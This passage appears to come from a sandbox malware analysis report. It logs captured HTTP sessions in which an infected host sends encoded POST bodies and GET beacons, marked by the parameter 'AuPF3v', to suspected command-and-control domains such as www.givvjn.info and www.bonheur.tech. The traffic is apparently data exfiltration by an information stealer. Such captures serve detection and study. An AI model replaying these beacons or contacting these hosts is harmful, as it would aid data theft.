2b 33 62 4c 50 79 50 48 38 50 57 62 4e 4b 46 6c 59 38 30 5a 6f 65 42 42 4e 62 54 77 34 71 68 73 6e 69 53 37 74 38 33 73 41 34 45 6d 50 4a 54 53 31 76 4d 63 58 6a 6a 78 69 72 76 68 38 45 62 6b 72 51 6f 39 71 [TRUNCATED] Data Ascii: AuPF3v=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+h7Vd4eDFr7183rEtKuW4A3H1npfbtbY2thtel08HdIYRPDf44G7fLp+z2YfbwgF9AvOD+AI7LZ7TGBOiD4aSNNJC9+TTLhj8J4GVN2UtutD8KxHKRN3KxEcHbgei2+3bLPyPH8PWbNKFlY80ZoeBBNbTw4qhsniS7t83sA4EmPJTS1vMcXjjxirvh8EbkrQo9q5izW026YBV+a0eZTa5Gs4rwJ6Fl0UACMH0Dxw/Mo14s26X9Wvlq2w9L7kbvLEfaA9vELxYMKGHFX9VBnF0Y/rasbCSYe7NGYCzWbjOoOZiSIUgmYCXTUMec7Akv0IObf7p00fvMw084JAUjGjYA3+riLnwkO0kcaDekzygDHv6O5JtKIAq2vGtqYLGoyKLfqyu5E2qxqgOdpw10+X8BiG4OSeZZ1oLHMnCss21407VRW2+xGpvaIiWWuA+OIMeph4TiMETcMgXQtB9WxJvpzaotAi86271PilkISdxdBsBEg8cp69KMK9qghrB66gWLyp6+Ou9PEq8FZt1odZbYyjuFMCqGkPiFI0+j6dzyFt1rcJVPKwN+mPYlbJPwrGG1mh78QBnBXwksRWvX64Evq4akbAxx+K/KxhfjoevXYbLZ/0B2EpcdXh2zfi0Bi+0sRRp7J2YVojieH8H86+fqcIqqH6i0KFGuZ5BJgYuFFqr6XyJfU49ZwNPKfXtBakHFytUH5lZs1rqHtEObtOMAu/zTHMVWVa0ogY+7WI+k0VZq2Rh+I9pjLxOu48XR+sK++jKEcRxCCDzVlZ7Q/Thp7ENniqFFfapUoDeymYvYaumZogC33wF/tqwFvt9BkQDGtGvwVuqohEQ1V+I9ajsgYjpqG8o/a5qVAWY [TRUNCATED]
Jan 13, 2025 10:25:33.957839966 CET	3867	OUT	Data Raw: 4d 79 43 54 37 63 6a 2b 76 6f 5a 63 59 44 49 47 59 42 6d 44 74 63 78 7a 44 70 61 4c 52 71 77 32 43 36 71 30 6a 4a 57 4c 52 5a 32 43 2f 2f 37 2f 79 33 64 39 48 45 77 67 4b 76 73 43 38 6e 68 58 34 67 70 38 6e 55 2f 61 30 5a 62 70 38 73 56 75 76 5a Data Ascii: MyCT7cj+voZcYDIGYBmDtcxzDpaLRqw2C6q0jJWLRZ2C//7/y3d9HEwgKvsC8nhX4gp8nU/a0Zbp8sVuvZH+dtWUzEN8DO+1BURb7tsVVA3kZzAgNVRRHjpLe3sMMykvarpG7rNrUnHxJE5ulapuKsnaiwijaoV6r5XWCsfRfUXnwSVGakGvBhUleIM8tfWzYGbpsedBA+mH2Wf+wae5w5+su0+ZcwFJSS6c988pNKRFY9iFRwi
Jan 13, 2025 10:25:33.957859993 CET	1289	OUT	Data Raw: 45 47 35 79 35 42 59 55 57 4f 74 78 47 59 4d 69 4f 2b 57 6c 71 6d 55 4f 46 38 67 77 47 33 77 59 4b 6f 6a 71 77 64 52 4b 67 51 79 43 5a 38 4d 53 57 58 49 30 36 2f 6c 31 6a 50 4b 46 6f 34 61 6b 76 4d 72 2b 63 31 65 39 76 59 50 4a 43 6e 67 45 71 56 Data Ascii: EG5y5BYUWOtxGYMiO+WlqmUOF8gwG3wYKojqwdRKgQyCZ8MSWXI06/l1jPKFo4akvMr+c1e9vYPJCngEqV/Yn2kBDb8WhGFHbYT+7QT8jE0AXHHX03Z8jOdMEwEPWri7xSFKH9Tn+vNDCnNLcTpIwTrjyZx+VmK7E5SYJzq3CkvgaCfMr6jXtVwwN9IKYvfARfAA/BAOf6JR5Bquv1rwrMp/w/7cKFw1GDeDT+kb1GJS9Q0MgS3
Jan 13, 2025 10:25:33.958049059 CET	228	OUT	Data Raw: 5a 67 55 4d 66 56 59 4d 32 69 66 55 76 62 34 4b 56 48 31 4e 4f 42 4f 43 43 37 38 59 4d 6c 71 2f 69 75 57 61 78 62 2b 7a 48 7a 47 63 62 69 4a 4d 73 51 58 57 77 62 36 75 47 43 35 44 6e 35 53 49 7a 67 65 33 4c 30 49 38 54 4b 75 59 4f 57 77 71 5a 65 Data Ascii: ZgUMfVYM2ifUvb4KVH1NOBOCC78YMlq/iuWaxb+zHzGcbiJMsQXWwb6uGC5Dn5SIzge3L0I8TKuYOWwqZeNS5QKCJGaqMwBr7Mwtw2MLUxwVoLA0tJRP3mZR28a8ZZCiUv/wX+JxgiFCJz3ZHeL3fk/oImtNVJkDUlVz93WT16ChrhYW110AxRka05wZepnLIzzoyknQxGdVq1loZSC3+3CeahXGHxIu/w==
Jan 13, 2025 10:25:34.145819902 CET	918	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:34 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.11.20	49835	199.192.21.169	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:36.653534889 CET	528	OUT	GET /qps0/?AuPF3v=oe/Nf5ZxPavzyNCK1vJM2Ozzw7iHMrsFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2gmVOP/g7WXCZMIn3pc=&v1GdZ=vUN3 HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:25:36.827260017 CET	933	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:25:36 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.11.20	49836	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:50.330992937 CET	796	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 36 74 45 4b 62 36 65 41 75 4f 71 6d 4c 42 72 6e 63 57 42 4e 41 3d 3d Data Ascii: AuPF3v=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ6tEKb6eAuOqmLBrncWBNA==
Jan 13, 2025 10:25:51.371068954 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:25:51 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.11.20	49837	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:53.179712057 CET	816	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 64 46 41 48 36 4d 63 6a 38 68 46 52 67 4c 4c 46 4e 32 68 55 3d Data Ascii: AuPF3v=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
Jan 13, 2025 10:25:54.198919058 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:25:54 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.11.20	49838	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:56.022808075 CET	7965	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 43 75 4d 75 7a 53 42 7a 72 78 49 4d 4c 42 4d 46 59 66 74 6b 34 32 35 62 4e 73 44 71 76 4f 69 72 72 6b 49 4e 61 42 71 48 39 48 73 57 65 36 62 2f 34 73 37 7a 74 33 79 4e 47 68 6a 55 53 58 42 54 36 66 4c 75 48 56 33 62 4f 70 61 76 68 30 68 53 55 63 39 4c 4e 51 59 42 62 46 58 4b 4f 65 5a 64 46 32 48 76 73 5a 78 67 44 76 4e 62 2b 4e 41 55 33 4e 64 51 38 30 55 49 63 6c 37 4f 73 72 73 73 74 5a 49 5a 62 6f 51 6b 37 68 52 51 46 66 71 37 31 53 47 4f 34 74 52 47 70 59 72 34 41 41 76 4a 59 42 37 6b 45 4c 74 4c 52 66 38 73 63 2f 58 4b 7a 50 4a 67 55 32 63 52 43 49 30 48 6c 56 6c 64 6f 4b [TRUNCATED] Data Ascii: AuPF3v=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1CuMuzSBzrxIMLBMFYftk425bNsDqvOirrkINaBqH9HsWe6b/4s7zt3yNGhjUSXBT6fLuHV3bOpavh0hSUc9LNQYBbFXKOeZdF2HvsZxgDvNb+NAU3NdQ80UIcl7OsrsstZIZboQk7hRQFfq71SGO4tRGpYr4AAvJYB7kELtLRf8sc/XKzPJgU2cRCI0HlVldoKYvJCtlS7eWmt6rdghCkHY8hWAO4inU3/up73InoWYO1ZzU+wqvmDpkbQoRPPgKKzA/R2QqpCgxC8k6PWIr6GaZjmEjPhwRWlJt5JuoCrKcEpG6E1S4QxFCJvR9eYcvksT2G9m0zhhbkeYwm4faEMMMWchO1RKXRaGVfFomGfn6KgdUHFnQ3fnT+ZXl3JGwacKEQpzerZp+HrTvTz/U5qWVZA2LzbaUR8gHzeQnEWY430fZ0x+s1TirXALCgy2udthlheVtPTzz7z1lezsxt6UZsXlbQVTNJ5Q+B2eh3Jhi/rgCJVOE4slw9vew3dB/ZHtZn/7z+p1hdSn0oCJ4bMgDqh3Bzz2GWSQaYfducim0oFunMSBJs3IDRwYtUQTSmLmsR+C73u4trTk9BMwkdoW6J0A2PdOHT5q6qYHW5YJQ1p0FsQ2jVNNmaTNdIjVECmxlrwBqER1dS+tGtaqSXWeSu6UEP0VEvcVYt9oJWoDJQieVA24aiehWmTjRW/bVvZsjAzLWT3mI3U4Gimd2yINu82cVe45mqtIUBTDRGugBbJTR11wYsdI1YTWNnqLa5VI4QC+c3UCeyzy19RfDTl3Ooix/Ls5WI7J/+8r0z3o+Hmaa/s7hgUQpiZ2uH9ZPd6P9DVz/A8eovQ0AE4e63FNkxtIc+qXaDDe7 [TRUNCATED]
Jan 13, 2025 10:25:57.044773102 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:25:56 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.11.20	49839	47.83.1.90	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:25:58.876462936 CET	529	OUT	GET /nkmx/?AuPF3v=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&v1GdZ=vUN3 HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:25:59.939762115 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:25:59 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.11.20	49840	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:06.068713903 CET	799	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 35 57 2b 6b 55 78 57 39 43 4d 31 4f 46 58 67 30 4e 2b 33 48 77 3d 3d Data Ascii: AuPF3v=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
Jan 13, 2025 10:26:06.169997931 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.11.20	49841	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:08.695626020 CET	819	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 66 45 46 4a 71 46 68 55 62 51 6b 58 78 4f 76 37 61 38 64 45 3d Data Ascii: AuPF3v=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
Jan 13, 2025 10:26:08.801856995 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.11.20	49842	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:26:11.322344065 CET	1289	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 6a 39 30 54 6b 6d 6a 47 31 6a 35 35 45 55 76 32 31 56 44 62 61 4f 30 41 6e 37 2b 34 46 59 70 35 68 73 35 51 77 4a 44 37 6a 33 70 37 72 48 51 4a 41 55 32 78 36 4e 33 43 45 4d 68 77 46 6d 70 36 4b 30 41 66 54 79 58 59 61 50 62 6a 68 61 7a 7a 7a 36 36 66 32 4a 6a 67 52 6a 61 49 35 70 55 51 65 65 79 34 31 71 53 5a 62 65 79 64 4a 6c 64 53 6c 37 73 74 50 38 62 51 6e 77 69 30 54 35 4f 52 67 6d 6f 71 42 52 49 45 6d 77 4b 72 32 73 6f 52 70 76 6f 52 43 41 64 32 4f 61 78 6b 4c 55 6b 2f 5a 6b 64 6d 6a 55 4e 4c 79 65 58 55 76 53 4f 33 49 2b 42 32 69 71 4e 34 6a 48 71 37 74 59 35 61 4a 55 43 [TRUNCATED] Data Ascii: AuPF3v=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwj90TkmjG1j55EUv21VDbaO0An7+4FYp5hs5QwJD7j3p7rHQJAU2x6N3CEMhwFmp6K0AfTyXYaPbjhazzz66f2JjgRjaI5pUQeey41qSZbeydJldSl7stP8bQnwi0T5ORgmoqBRIEmwKr2soRpvoRCAd2OaxkLUk/ZkdmjUNLyeXUvSO3I+B2iqN4jHq7tY5aJUCiiknmREZA9cZcJkDO2+6oD/LVa2d15kffj9dR6J5GJ07aWok6vBILgh79bpV52H+cR+RE+UczrNL+4F0/w+f4EeShNuSZAyM/94xHEvT1ze5ORCDvmft4wdGDmNiNBkcMbEqG8uyxdDWD49kiEFlR5Lrtao8BOfU0vPvkKhgVPJ6AgcIfM3hrlry9drRguaUok91QHWpywFR0fc9fUUK+LR5nrYHYRNsWpred7L7Kw8aw9VCan1w0kDZrppLXc9PKNe4z6E6QsbfA3orN/rzanbrZVtD3A46lioLf6j0hXFupgIe0UmmQBc+S8qMPedqF7Jodn+xK4UqThoSK+SEtY8umi+qmd5qNu
